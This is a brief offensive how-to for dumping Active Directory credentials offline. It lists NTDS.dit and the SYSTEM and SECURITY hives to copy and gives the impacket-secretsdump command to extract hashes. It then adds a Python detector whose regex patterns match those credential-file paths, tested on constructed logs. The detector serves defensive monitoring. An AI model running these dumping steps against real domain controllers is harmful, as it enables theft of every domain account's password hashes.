CRD - Dumping ntds.dit
1.0 Offline dump
1.1 Copy needed files
You’ll need some files to dump the credentials:
- %windir%\NTDS\NTDS.dit
- %windir%\System32\config\SYSTEM
- %windir%\System32\config\SECURITY (not sure if really needed)
Copy these files locally.
1.2 impacket-secretsdump
ATTENTION
Because there is no target, you have to append LOCAL to your command. Otherwise you will get an error!
impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
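
For defenders, the file set from 1.1 is a useful correlation key. The following is an added example (not from the original page or from Impacket) that flags an account whose process command lines reference both NTDS.dit and the SYSTEM hive within a short window. The record fields (time, host, user, command_line), the 30-minute window and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Files the page lists for an offline dump. %windir% may be logged unexpanded
# or as a drive path, so only the trailing path components are matched.
PATTERNS = {
    "NTDS.dit": re.compile(r"\\ntds\\ntds\.dit(?![\w.])", re.I),
    "SYSTEM": re.compile(r"\\system32\\config\\system(?![\w.])", re.I),
    "SECURITY": re.compile(r"\\system32\\config\\security(?![\w.])", re.I),
}
# The page is unsure whether SECURITY is needed, so it is not required here.
REQUIRED = {"NTDS.dit", "SYSTEM"}

def files_referenced(command_line):
    return {name for name, rx in PATTERNS.items() if rx.search(command_line)}

def correlate(events, window=timedelta(minutes=30)):
    """Alert once per (host, user) that references every REQUIRED file within
    `window`; older references are dropped. Returns (host, user, files)."""
    recent = defaultdict(list)  # (host, user) -> [(time, file name)]
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["user"])
        hits = [(ev["time"], n) for n in files_referenced(ev["command_line"])]
        recent[key] = [(t, n) for t, n in recent[key] + hits
                       if ev["time"] - t <= window]
        names = {n for _, n in recent[key]}
        if REQUIRED <= names and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], sorted(names)))
    return alerts

def _ev(hhmm, host, user, command_line):
    t = datetime.strptime("2024-01-01 " + hhmm, "%Y-%m-%d %H:%M")
    return {"time": t, "host": host, "user": user, "command_line": command_line}

# Constructed sample records, not real telemetry.
SAMPLE = [
    _ev("02:10", "dc01", r"CORP\svc_a", r"cmd /c copy C:\Windows\NTDS\NTDS.dit C:\Temp\a"),
    _ev("02:12", "dc01", r"CORP\svc_a", r"cmd /c copy %windir%\System32\config\SYSTEM C:\Temp\b"),
    _ev("09:00", "dc01", r"CORP\adm1", r"cmd /c dir C:\Windows\System32\config\SYSTEM.LOG1"),
    _ev("01:00", "dc02", r"CORP\adm2", r"cmd /c dir C:\Windows\NTDS\ntds.dit"),
    _ev("05:00", "dc02", r"CORP\adm2", r"cmd /c dir c:\windows\system32\config\system"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE))
```

Only the dc01 service account is reported: the hive's SYSTEM.LOG1 sidecar does not count as the hive, and the dc02 references are four hours apart.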